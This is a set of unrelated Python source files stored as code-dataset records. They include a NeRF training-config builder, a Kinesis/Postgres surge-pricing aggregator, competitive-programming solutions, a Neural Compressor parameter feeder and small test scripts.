'colors' : colors,\r\n 'labels' : labels\r\n }\r\n ","sub_path":"modules/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243880959","text":"import os, os.path as op, sys, time\nimport pyperclip\nimport xml.etree.ElementTree as ET\nfrom shutil import copyfile\nfrom reconfigure_utils import inject_pycharm_config\n\nDATA = \"rocket_random_exr\"\nNAME = \"\" # postfix for dataset name\n\nRES = \"256x256\"\nPIXELS_PER_VIEW = '256'\nVIEW_PER_BATCH = '6' # not sure, but better to be an even divisor of PIXELS_PER_VIEW\nCHUNK_SIZE = '1' #'256' # > 1 to save memory to time\n\nLR = '0.0001' # 0.001\n\nCOLOR_WEIGHT = '1.0' #'256.0'\nALPHA_WEIGHT = '1e-3' #'1e-3'\n\n\nREDUCE_STEP_SIZE_AT = '7500,22500,60000'\nHALF_VOXEL_SIZE_AT = '7500,22500,60000'\nPRUNNING_EVERY_STEPS = '7500'\n\nPRUNNING_TH = '0.5' # '0.5'\nSAVE_INTERVAL_UPDATES = '2500'#'750' # '100'\nTOTAL_NUM_UPDATE = '200000' # 150000\nTRAIN_VIEWS = '0..150' # '0..100'\nVALID_VIEWS = '150..200' # '100..200\nNUM_WORKERS = '10' # '0'\n\n# VALID_VIEWS, REDUCE_STEP_SIZE_AT, HALF_VOXEL_SIZE_AT = '195..200', '100,200,300', '100,200,300'\n\nPREPROCESS = 'log' # none/mstd/minmax/log/nsvf(min_color==-1!)\nMIN_COLOR = '0.0' #\nMAX_COLOR = '0.8' # 0.8 - rocket/guitar/lego/hotdog; 5.0 - sphere; 0.3 - drums; 0.6 - lego-random\nGAMMA_CORRECTION = '2.0' # 2.0 - rocket/guitar/drums; 1.0 - sphere/lego; 1.5 - hotdog\nBG_COLOR = '0.0' # '0.25,0.25,0.25' # '1.0,1.0,1.0'\nSIGMA_NOISE = True\n# SIGMA_NOISE_LIGHT = False # not implemented yet\n\n\nTRACE_NORMAL = False\nLAMBERT_ONLY = False\nTASK = 'single_object_light_rendering'\n\n# # \n# ARCH = \"nsvf_base\"\n# TASK = 'single_object_rendering'\n# # \n\n# # \n# ARCH = \"mlnrf_base\"\n# # EMBL_L = '10' # !! 
Both EMBL_V & EMBL_L should be set in order to have effect !!\n# # EMBL_V = '10'\n# # \n\n# # \n# ARCH = \"mlnrfnrf_base\"\n# PREDICT_L = True\n# # LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # rocket_exr -> 5k Watt\n# # LIGHT_INTENSITY = '300.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '400.0'#'300.0' # lego -> 0.7k Watt\n# # LIGHT_INTENSITY = '1000.0' # drums -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # hotdog -> 0.7k Watt\n# TEXTURE_LAYERS = '5'\n# # \n\n# \nARCH = \"mlnrfexva_base\"\nPREDICT_L = True\nVOXEL_SIGMA = 0.5\n# LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\nLIGHT_INTENSITY = '5.0' # 500 excol; rocket_exr -> 5k Watt\n# LIGHT_INTENSITY = '350.0' # tablelamp_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '50.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '40.0' # lego -> 0.7k Watt\n# LIGHT_INTENSITY = '50.0' # hotdog -> 0.7k Watt\nTEXTURE_LAYERS = '5'\n# \n\n# # \n# ARCH = \"mlnrfexbf_base\"\n# PREDICT_L = True\n# # LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # rocket_exr -> 5k Watt\n# # LIGHT_INTENSITY = '350.0' # tablelamp_exr -> 0.5k Watt\n# # LIGHT_INTENSITY = '200.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '20.0' # lego -> 0.7k Watt\n# # LIGHT_INTENSITY = '300.0' # hotdog -> 0.7k Watt\n# TEXTURE_LAYERS = '5'\n# # \n\n\n\nHDRFLIP = True\nLPIPS = True\n\nSUFFIX = \"v1\"\nDATASET = \"datasets/\" + DATA # \"data/Synthetic_NeRF/\" + DATA\nSAVE = \"checkpoint/\" + DATA + (('_' + NAME) if NAME else '')\n# SAVE = \"checkpoint/rocket_random_exr_test4\"\nMODEL = ARCH + SUFFIX\nVOXEL_NUM = '64' # '512' # mutually exclusive with VOXEL_SIZE = 0.27057\n#TODO: VOXEL_NUM & VOXEL_SIZE might not work as intended!\n\n\nUSE_OCTREE = True\n# USE_CPU = False # WARNING: does not work on CPU\n# SCENE_SCALE = '1.0'\n\nCOPY2CLIPBOARD = False # after running the script the configuration is inserted into clipboard\nINJECT_PYCHARM = True\nSAVE_FILE = True\nXML_PATH = '.run/train.run.xml'\nNUM_BACKUPS = 10\n\n\n# create directory if doesn't exist\n# if not os.path.exists(SAVE + '/' + MODEL): os.makedirs(SAVE + '/' + MODEL)\n\n# create configuration file\nparameters = DATASET\nif 'LIGHT_INTENSITY' in locals():\n\tparameters += '\\n--light-intensity ' + LIGHT_INTENSITY\n# parameters += '\\n--scene-scale ' + SCENE_SCALE\nparameters += '\\n--view-resolution ' + RES\nparameters += '\\n--valid-view-resolution ' + RES\nparameters += '\\n--view-per-batch ' + VIEW_PER_BATCH\nparameters += '\\n--valid-view-per-batch ' + VIEW_PER_BATCH\nparameters += '\\n--pixel-per-view ' + PIXELS_PER_VIEW\nparameters += '\\n--chunk-size ' + CHUNK_SIZE\nparameters += '\\n--valid-chunk-size ' + CHUNK_SIZE\nparameters += '\\n--lr ' + LR\nparameters += '\\n--color-weight ' + COLOR_WEIGHT\nparameters += '\\n--alpha-weight ' + ALPHA_WEIGHT\nparameters += '\\n--train-views \"' + TRAIN_VIEWS + '\"'\nparameters += '\\n--valid-views \"' + VALID_VIEWS + '\"'\nparameters += '\\n--half-voxel-size-at \"' + HALF_VOXEL_SIZE_AT + '\"'\nparameters += '\\n--reduce-step-size-at \"' + REDUCE_STEP_SIZE_AT + '\"'\nparameters += '\\n--pruning-every-steps ' + PRUNNING_EVERY_STEPS\nparameters += '\\n--save-interval-updates ' + SAVE_INTERVAL_UPDATES\nif 'VOXEL_SIGMA' in locals():\n\tparameters += '\\n--voxel-sigma ' + str(VOXEL_SIGMA)\nif 'PREPROCESS' in locals():\n\tparameters += '\\n--preprocess ' + PREPROCESS\nparameters += '\\n--min-color ' + MIN_COLOR\nparameters += '\\n--max-color ' + MAX_COLOR\nif 'GAMMA_CORRECTION' in locals():\n\tparameters += 
'\\n--gamma-correction ' + GAMMA_CORRECTION\nparameters += '\\n--total-num-update ' + TOTAL_NUM_UPDATE\nparameters += '\\n--max-update ' + TOTAL_NUM_UPDATE\nparameters += '\\n--user-dir fairnr'\n# parameters += '\\n--background-stop-gradient'\nparameters += '\\n--task ' + TASK\nparameters += '\\n--max-sentences 1'\nparameters += '\\n--no-preload'\nparameters += '\\n--sampling-on-mask 1.0'\nparameters += '\\n--no-sampling-at-reader'\nif 'SIGMA_NOISE' in locals() and SIGMA_NOISE:\n\tparameters += '\\n--discrete-regularization'\nif 'SIGMA_NOISE_LIGHT' in locals() and SIGMA_NOISE_LIGHT:\n\tparameters += '\\n--discrete-regularization-light'\nif 'HDRFLIP' in locals() and HDRFLIP:\n\tparameters += '\\n--eval-hdrflip'\nif 'LPIPS' in locals() and LPIPS:\n\tparameters += '\\n--eval-lpips'\nif 'COMPOSITE_R' in locals() and COMPOSITE_R:\n\tparameters += '\\n--composite-r'\nif 'VOXEL_NUM' in locals():\n\tparameters += '\\n--voxel-num ' + locals()['VOXEL_NUM']\nelif 'VOXEL_SIZE' in locals():\n\tparameters += '\\n--voxel-size ' + locals()['VOXEL_SIZE']\nif 'TRACE_NORMAL' in locals() and TRACE_NORMAL:\n\tparameters += '\\n--trace-normal'\nif 'LAMBERT_ONLY' in locals() and LAMBERT_ONLY:\n\tparameters += '\\n--lambert-only'\nif 'PREDICT_L' in locals() and PREDICT_L:\n\tparameters += '\\n--predict-l'\nparameters += '\\n--transparent-background \"' + BG_COLOR + '\"'\n# parameters += '\\n--no-background-loss'\nparameters += '\\n--background-stop-gradient'\nparameters += '\\n--arch ' + ARCH\nparameters += '\\n--initial-boundingbox ' + DATASET + '/bbox.txt'\nparameters += '\\n--raymarching-stepsize-ratio 0.125'\nif USE_OCTREE:\n\tparameters += '\\n--use-octree'\nif 'TEXTURE_LAYERS' in locals():\n\tparameters += '\\n--texture-layers ' + TEXTURE_LAYERS\nif 'EMBL_L' in locals() and 'EMBL_V' in locals():\n\tparameters += '\\n--inputs-to-texture feat:0:256,ray:'+EMBL_V+',light:'+EMBL_L+',lightd:0:1'\n# if USE_CPU:\n# \tparameters += '\\n--cpu'\nparameters += '\\n--optimizer \"adam\"'\nparameters += '\\n--adam-betas \"(0.9, 0.999)\"'\nparameters += '\\n--lr-scheduler \"polynomial_decay\"'\nparameters += '\\n--end-learning-rate ' + str(float(LR) * 1e-2)\nparameters += '\\n--clip-norm 0.0' # 0.01\nparameters += '\\n--criterion \"srn_loss\"'\nparameters += '\\n--num-workers ' + NUM_WORKERS\nparameters += '\\n--seed 2'\nparameters += '\\n--virtual-epoch-steps 5000'\nparameters += '\\n--save-interval 1'\nif 'PRUNNING_TH' in locals():\n\tparameters += '\\n--pruning-th ' + PRUNNING_TH\n# '--rendering-every-steps'\nparameters += '\\n--keep-interval-updates 5'\nparameters += '\\n--log-format simple'\nparameters += '\\n--log-interval 1'\nparameters += '\\n--tensorboard-logdir ' + SAVE + '/tensorboard/' + MODEL\nparameters += '\\n--save-dir ' + SAVE + '/' + MODEL\n\nif SAVE_FILE:\n\twith open('configuration.txt', 'w') as f:\n\t\t# f.write(parameters)\n\t\tf.write(parameters.replace('\\n', ' '))\n\nif COPY2CLIPBOARD:\n\tpyperclip.copy(parameters)\n\nif INJECT_PYCHARM:\n\tinject_pycharm_config('train', XML_PATH, parameters, NUM_BACKUPS)\n\n# # \n# ARCH = \"mlnrfex_base\"\n# TRACE_NORMAL = True\n# LAMBERT_ONLY = False\n# TEXTURE_LAYERS = '4'\n# LIGHT_INTENSITY = '1000.0'\n# # \n\n# # \n# ARCH = \"mlnrfiva_base\"\n# VOXEL_SIGMA = 0.8\n# # ","sub_path":"util/reconfigure_train.py","file_name":"reconfigure_train.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99999972","text":"import re, subprocess\nfrom datetime import 
datetime\n\nimport glob, gzip, sys, os, time\n\ndef getInterfaceTotals():\n# DEVNULL = open(os.devnull, 'w')\n# command = \"ifconfig \" + interface, \"r\"\n# process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=DEVNULL, shell=True)\n f = open('ifconfig_output.txt',\"r\")\n result=f.read()\n f.close()\n print(result)\n\n r_ipconfig = re.compile(r\"RX bytes:(\\d+) .+ TX bytes:(\\d+)\")\n for line in result.split('\\n'):\n print('line is:',line)\n m_ipconfig = r_ipconfig.search(line)\n print('m_ipconfig:',m_ipconfig)\n if m_ipconfig:\n print(int(m_ipconfig.group(1)),int(m_ipconfig.group(2)))\n return(int(m_ipconfig.group(2)), int(m_ipconfig.group(1)))\n return (0, 0)\n\nmyName=\"\"\n#print('What is your name?') # ask for their name\nmyName = input(\"What is your name? \")\n# or just: myName = input('What is your name?')\nprint('It is good to meet you, ' + myName)\n\n#result = getInterfaceTotals()\n# print(result)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121676123","text":"from dbconnectprgm.dbconnect import *\ndb=get_connection()\ncursor=db.cursor()\n\nsql=\"select * from faculty\"\ntry:\n cursor.execute(sql)\n queryset=cursor.fetchall()\n # (100,ajay,ddatastructure) (101,vijay,csa)\n for faculty in queryset:\n print(\"id=\",faculty[0])\n print(\"name \",faculty[1])\n\nexcept Exception as e:\n print(e.args)\n\nfinally:\n db.close()","sub_path":"python to database connection/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641220430","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2021/6/17 10:34\r\n# File: 0065.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def isNumber(self, s: str) -> bool:\r\n if s == 'e' or 'f' in s: return False\r\n try:\r\n float(s)\r\n return True\r\n except: return False\r\n","sub_path":"Solutions/0065/0065.py","file_name":"0065.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584582073","text":"import sys,time\nimport geohash\nimport json\nimport boto3\nimport copy\nimport math\nimport logging\nimport psycopg2\nfrom decimal import *\nfrom datetime import datetime, timedelta\n\nconf_file = open(\"/home/ec2-user/.conf/db_config.json\",\"r\")\nconf = json.loads(conf_file.read())\nconf_file.close()\n\nrds_client = psycopg2.connect(database=conf[\"db\"], user = conf[\"user\"],\\\n password = conf[\"password\"], host = conf[\"host\"], port = conf[\"port\"])\nkinesis_client = boto3.client(\"kinesis\")\nlogger = None\n\ndef populateCount(geo_dict,rec_list,end_time):\n for rec in rec_list:\n data = json.loads(rec[\"Data\"])\n ts = datetime.strptime(data[\"ts\"],\"%Y-%m-%d %H:%M:%S\")\n if ts > end_time: return False\n geo_dict[data[\"hash\"]] = geo_dict[data[\"hash\"]]+1 if data[\"hash\"] in geo_dict else 1\n return True\n\ndef fetchAndAggregateRecords(queue_name,start_time,end_time):\n stream_info = kinesis_client.describe_stream(StreamName=queue_name)\n shard_id = stream_info[\"StreamDescription\"][\"Shards\"][0][\"ShardId\"]\n logger.info(\"shard_id:{} \".format(shard_id))\n\n shard_itr = kinesis_client.get_shard_iterator(\n StreamName=queue_name,\n ShardId=shard_id,\n ShardIteratorType=\"AT_TIMESTAMP\",\n Timestamp=start_time\n )\n shard_itr_cd = 
shard_itr[\"ShardIterator\"]\n    resp = kinesis_client.get_records(ShardIterator=shard_itr_cd, Limit=100)\n\n    geo_dict = {}\n    if not populateCount(geo_dict,resp[\"Records\"],end_time):return geo_dict\n\n    total_rec_cnt = len(resp[\"Records\"])\n    while resp[\"NextShardIterator\"] is not None:\n        shard_itr_cd = resp[\"NextShardIterator\"]\n        time.sleep(0.5)\n        resp = kinesis_client.get_records(ShardIterator=shard_itr_cd,Limit=100)\n\n        rec_cnt = len(resp[\"Records\"])\n        if rec_cnt==0:return geo_dict\n        else: total_rec_cnt+=rec_cnt\n        logger.info(\"Total records fetched:{}\".format(total_rec_cnt))\n\n        if not populateCount(geo_dict,resp[\"Records\"],end_time):return geo_dict\n\n    return geo_dict\n\ndef surge(demand,supply,max_surge):\n    coeff = 1-max_surge\n    x = float(demand)/float(supply)\n    return max_surge + coeff * math.exp((1-x)/2)\n\ndef computeAreawiseSurge(geo_demand,geo_supply,max_surge):\n    surge_dict = {}\n    area_list = list(set(geo_demand) | set(geo_supply))#union of keys; dict views can't be added with + in Python 3\n    for area_hash in area_list:\n        if area_hash not in geo_supply:\n            surge_dict[area_hash] = max_surge\n        elif area_hash not in geo_demand:\n            surge_dict[area_hash] = 0\n        else:\n            surge_dict[area_hash] = surge(geo_demand[area_hash],geo_supply[area_hash],max_surge)\n    return surge_dict\n\ndef updateSurgeTable(geo_surge,geo_demand,geo_supply):\n    surge_table = \"public.data_service_regionsurge\"\n\n    logger.info(\"Truncating the table...\")\n    cur = rds_client.cursor()\n    cur.execute(\"TRUNCATE {};\".format(surge_table))\n    rds_client.commit()\n    logger.info(\"Table truncated successfully.\")\n\n    logger.info(\"Inserting the records into the table...\")\n    ctr = 0\n    for area_hash in geo_surge:\n        supply = geo_supply[area_hash] if area_hash in geo_supply else 0\n        demand = geo_demand[area_hash] if area_hash in geo_demand else 0\n        cur.execute(\"INSERT INTO {} (geo_hash,demand,supply,surge) VALUES ('{}',\\\n            {},{},{})\".format(surge_table,area_hash, demand, supply, geo_surge[area_hash]))\n        ctr += 1\n        if ctr%50==0:\n            rds_client.commit()\n            logger.info(\"Total records inserted:{}\".format(ctr))\n    rds_client.commit()\n\nif __name__ == \"__main__\":\n    total_params = 5\n    params_given = len(sys.argv)\n    if params_given != total_params+1:\n        print(\"Missing arguments. 
Required {} given {}\".format(total_params,params_given))\n sys.exit(2)\n\n demand_queue = sys.argv[1]\n supply_queue = sys.argv[2]\n agg_interval = int(sys.argv[3])\n max_surge = int(sys.argv[4])\n log_file = sys.argv[5]\n\n logging.basicConfig(filename=log_file,format='%(asctime)s - %(levelname)s - %(message)s',level=logging.INFO)\n logger=logging.getLogger(__name__)\n\n end_time = datetime.now()\n start_time = end_time - timedelta(minutes=agg_interval)\n\n logger.info(\"Fetching demand records...\")\n geo_demand = fetchAndAggregateRecords(demand_queue,start_time,end_time)\n logger.info(\"Total {} demand records fetched for {} geo_areas\".format(sum(geo_demand.values()),len(geo_demand)))\n\n logger.info(\"Fetching supply records...\")\n geo_supply = fetchAndAggregateRecords(supply_queue,start_time,end_time)\n logger.info(\"Total {} supply records fetched for {} geo_areas\".format(sum(geo_supply.values()),len(geo_supply)))\n\n logger.info(\"Calculating surge for the areas...\")\n geo_surge = computeAreawiseSurge(geo_demand,geo_supply,max_surge)\n logger.info(\"Surge calculation complete.\")\n\n logger.info(\"Updating the surge table with {} records...\".format(len(geo_surge)))\n updateSurgeTable(geo_surge,geo_demand,geo_supply)\n logger.info(\"Surge table updated successfully.\")\n\n logger.info(\"================================\\n\")\n","sub_path":"kinesis/surge/demand_supply_aggregator.py","file_name":"demand_supply_aggregator.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"475153176","text":"if __name__ == \"__main__\":\n n,m = [int(x) for x in input().strip().split()]\n image = [input() for i in range(n)]\n\n res = 0\n for i in range(n-1):\n for j in range(m-1):\n s = image[i][j] + image[i][j+1] + image[i+1][j] + image[i+1][j+1]\n #print(\"\".join(sorted(s)))\n if \"\".join(sorted(s)) == \"acef\":\n res += 1\n print(res)\n","sub_path":"150607-Looksery-Cup-2015/549A-Face-Detection.py","file_name":"549A-Face-Detection.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546324027","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Parameters feeder module.\"\"\"\nimport os\nfrom typing import Any, Dict, List, Optional\n\nfrom neural_compressor.experimental.metric.metric import framework_metrics\nfrom neural_compressor.objective import OBJECTIVES\nfrom neural_compressor.strategy import STRATEGIES\nfrom neural_compressor.ux.components.model.repository import ModelRepository\nfrom neural_compressor.ux.utils.exceptions import ClientErrorException\nfrom neural_compressor.ux.utils.utils import (\n check_module,\n filter_transforms,\n load_dataloader_config,\n load_help_nc_params,\n load_model_config,\n load_precisions_config,\n load_transforms_config,\n)\nfrom neural_compressor.ux.web.configuration import 
Configuration\n\n\nclass Feeder:\n \"\"\"Parameters feeder class.\"\"\"\n\n def __init__(self, data: Dict[str, Any]) -> None:\n \"\"\"Initialize parameters feeder class.\"\"\"\n self.param: Optional[str] = data.get(\"param\")\n self.config: Dict[str, Any] = data.get(\"config\", {})\n\n def feed(self) -> Dict[str, Any]:\n \"\"\"Feed the parameters.\"\"\"\n param_mapper = {\n \"framework\": self.get_frameworks,\n \"domain\": self.get_domains,\n \"model\": self.get_models,\n \"dataloader\": self.get_dataloaders,\n \"transform\": self.get_transforms,\n \"objective\": self.get_objectives,\n \"strategy\": self.get_strategies,\n \"quantization_approach\": self.get_quantization_approaches,\n \"metric\": self.get_metrics,\n \"precision\": self.get_precisions,\n }\n if self.param is None:\n raise ClientErrorException(\"Parameter not defined.\")\n get_param = param_mapper.get(self.param, None)\n if get_param is None:\n raise ClientErrorException(\n f\"Could not found method for {self.param} parameter.\",\n )\n\n return {\n self.param: get_param(),\n }\n\n @staticmethod\n def get_frameworks() -> List[dict]:\n \"\"\"Get list of available frameworks.\"\"\"\n supported_frameworks = ModelRepository.get_supported_frameworks()\n frameworks = []\n models_config = load_model_config()\n for framework in models_config.keys():\n if framework.startswith(\"__help__\"):\n continue\n if framework not in supported_frameworks:\n continue\n help_msg = models_config.get(f\"__help__{framework}\", \"\")\n frameworks.append({\"name\": framework, \"help\": help_msg})\n return frameworks\n\n def get_domains(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of available domains.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n models_config = load_model_config()\n domains = []\n for domain in models_config.get(framework, {}).keys():\n if domain.startswith(\"__help__\"):\n continue\n help_msg = models_config.get(framework, {}).get(f\"__help__{domain}\", \"\")\n domains.append(\n {\n \"name\": domain,\n \"help\": help_msg,\n },\n )\n return domains\n\n def get_models(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of models.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n domain = self.config.get(\"domain\", None)\n if domain is None:\n raise ClientErrorException(\"Domain not set.\")\n models_config = load_model_config()\n\n raw_models_dict = models_config.get(framework, {}).get(domain, {})\n models = []\n for model in raw_models_dict.keys():\n if model.startswith(\"__help__\"):\n continue\n help_msg = raw_models_dict.get(f\"__help__{model}\", \"\")\n models.append({\"name\": model, \"help\": help_msg})\n return models\n\n def get_dataloaders(self) -> List[Dict[str, Any]]:\n \"\"\"Get available dataloaders.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n for fw_dataloader in load_dataloader_config():\n if fw_dataloader.get(\"name\") == framework:\n return fw_dataloader.get(\"params\", [])\n return []\n\n def get_transforms(self) -> List[Dict[str, Any]]:\n \"\"\"Get available transforms.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n domain = self.config.get(\"domain\", None)\n transforms = []\n for fw_transforms in load_transforms_config():\n if fw_transforms.get(\"name\") == 
framework:\n transforms = fw_transforms.get(\"params\", [])\n break\n if domain is not None:\n transforms = filter_transforms(transforms, framework, domain)\n return transforms\n\n @staticmethod\n def get_objectives() -> List[dict]:\n \"\"\"Get list of supported objectives.\"\"\"\n help_dict = load_help_nc_params(\"objectives\")\n\n objectives = []\n for objective in OBJECTIVES.keys():\n help_msg = help_dict.get(f\"__help__{objective}\", \"\")\n objectives.append({\"name\": objective, \"help\": help_msg})\n return objectives\n\n @staticmethod\n def get_strategies() -> List[Dict[str, Any]]:\n \"\"\"Get list of supported strategies.\"\"\"\n help_dict = load_help_nc_params(\"strategies\")\n strategies = []\n for strategy in STRATEGIES.keys():\n if \"sigopt\" == strategy:\n continue\n help_msg = help_dict.get(f\"__help__{strategy}\", \"\")\n strategies.append({\"name\": strategy, \"help\": help_msg})\n return strategies\n\n def get_precisions(self) -> List[dict]:\n \"\"\"Get list of available precisions.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n return load_precisions_config().get(framework, [])\n\n def get_quantization_approaches(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of supported quantization approaches.\"\"\"\n approaches = [\n {\n \"name\": \"post_training_static_quant\",\n \"help\": \"help placeholder for post_training_static_quant\",\n },\n ]\n framework = self.config.get(\"framework\", None)\n if framework in [\"pytorch\", \"onnxrt\"]:\n approaches.append(\n {\n \"name\": \"post_training_dynamic_quant\",\n \"help\": f\"help placeholder for {framework} post_training_dynamic_quant\",\n },\n )\n\n return approaches\n\n def get_metrics(self) -> List[Dict[str, Any]]:\n \"\"\"Get list of possible metrics.\"\"\"\n framework = self.config.get(\"framework\", None)\n if framework is None:\n raise ClientErrorException(\"Framework not set.\")\n\n if framework == \"pytorch\":\n check_module(\"ignite\")\n else:\n check_module(framework)\n\n help_dict = load_help_nc_params(\"metrics\")\n\n key_in_framework_metrics = \"onnxrt_qlinearops\" if framework == \"onnxrt\" else framework\n metrics_class = framework_metrics.get(key_in_framework_metrics)\n raw_metric_list = list(metrics_class().metrics.keys()) if metrics_class else []\n raw_metric_list += [\"custom\"]\n metrics_updated = _update_metric_parameters(raw_metric_list)\n for metric, value in metrics_updated.copy().items():\n if isinstance(value, dict):\n for key in value.copy().keys():\n for field in [\"help\", \"label\"]:\n msg_key = f\"__{field}__{key}\"\n metrics_updated[metric][msg_key] = help_dict.get(\n metric,\n {},\n ).get(msg_key, \"\")\n metrics_updated[f\"__help__{metric}\"] = help_dict.get(\n f\"__help__{metric}\",\n \"\",\n )\n return self._parse_help_in_dict(metrics_updated)\n\n def _parse_help_in_dict(self, data: dict) -> list:\n parsed_list = []\n for key, value in data.items():\n if key.startswith(\"__help__\") or key.startswith(\"__label__\"):\n continue\n if isinstance(value, dict):\n parsed_list.append(\n {\n \"name\": key,\n \"help\": data.get(f\"__help__{key}\", \"\"),\n \"params\": self._parse_help_in_dict(value),\n },\n )\n else:\n item = {\n \"name\": key,\n \"help\": data.get(f\"__help__{key}\", \"\"),\n \"value\": value,\n }\n label = data.get(f\"__label__{key}\")\n if label:\n item[\"label\"] = label\n parsed_list.append(item)\n return parsed_list\n\n\ndef _update_metric_parameters(metric_list: List[str]) -> Dict[str, 
Any]:\n    \"\"\"Add parameters to metrics.\"\"\"\n    metrics: Dict[str, Any] = {}\n    for metric in metric_list:\n        if metric == \"topk\":\n            metrics.update({metric: {\"k\": [1, 5]}})\n        elif metric == \"COCOmAP\":\n            annotation_path = os.path.join(Configuration().workdir, \"label_map.yaml\")\n            metrics.update({metric: {\"anno_path\": annotation_path}})\n        elif metric in [\"MSE\", \"RMSE\", \"MAE\"]:\n            metrics.update({metric: {\"compare_label\": True}})\n        else:\n            metrics.update({metric: None})\n    return metrics\n\n\ndef get_possible_values(data: dict) -> Dict[str, List[Any]]:\n    \"\"\"Get list of possible values for specified scenario with \"help\" information.\"\"\"\n    feeder = Feeder(data)\n    return feeder.feed()\n","sub_path":"neural_compressor/ux/components/configuration_wizard/params_feeder.py","file_name":"params_feeder.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"512633342","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport scipy.stats\n\n\n\nnsamp = 10000\n\nx0 = 5\nxsd = 3\n\ny0 = 9\nysd = 1.\n\nnbinx = 100\nnbiny = 100\n\n\ncov = np.zeros((2,2))\ncov[0,0] = xsd**2  # variance is the squared standard deviation\ncov[1,1] = ysd**2\n\n\n\n\nsamp = np.random.multivariate_normal([x0,y0],cov,nsamp)\nx = samp[:,0]\ny = samp[:,1]\n\nxlimlo = np.min(x)\nxlimhi = np.max(x)\nbinwidth_x = (xlimhi - xlimlo)/(nbinx - 1)\n\nylimlo = np.min(y)\nylimhi = np.max(y)\nbinwidth_y = (ylimhi - ylimlo)/(nbiny - 1)\n\n\nboth = np.array((x,y)).T\npdf1=scipy.stats.kde.gaussian_kde(both.T)\nq,w=np.meshgrid(np.arange(xlimlo,xlimhi,binwidth_x), np.arange(ylimlo,ylimhi,binwidth_y))\nr1=pdf1([q.flatten(),w.flatten()])\nr1.shape=(q.shape[0],q.shape[1])\n\n\nplt.scatter(samp[:,0], samp[:,1])\nplt.contour(np.arange(xlimlo,xlimhi,binwidth_x), np.arange(ylimlo,ylimhi,binwidth_y), r1)\n\nplt.show()\n\n","sub_path":"pythontests/test_kde.py","file_name":"test_kde.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"402655943","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 2 19:46:03 2018\n\n@author: hsf\n\"\"\"\n#import texasfunction as tf\n#import texas_predict as tp\n#\n#player_tmp1 = tf.usr(\"robot1\") \n#player_tmp1.handcards([39,40])\n#player_tmp2 = tf.usr(\"robot2\") \n#player_tmp2.handcards([39,46])\n#player_tmp3 = tf.usr(\"robot3\") \n#player_tmp3.handcards([39,42])\n#player_tmp3.drop = 1\n#player_tmp2.drop = 1\n#\n#\n#cards=[14,15,16]\n#print(tp.predict_self(player_tmp1, cards, 3, 2, 10))\n#print(tp.predict_all([player_tmp1,player_tmp2,player_tmp3], cards, 10))\n\n#ss = input(\"input:\")\n#if ss.isdigit():\n# print('%s%s' % (ss,ss))\n \nimport socket\nfrom errno import *\nsocket.setdefaulttimeout(0.01)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#try:\n# sock.connect((\"192.168.1.211\", 5005))\n#except socket.timeout as e:\n# print(\"timeout\")\n# pass\n\n\nerr = sock.connect_ex((\"192.168.1.211\", 5005))\nprint(err)\nif err == EWOULDBLOCK:\n    print('1')","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
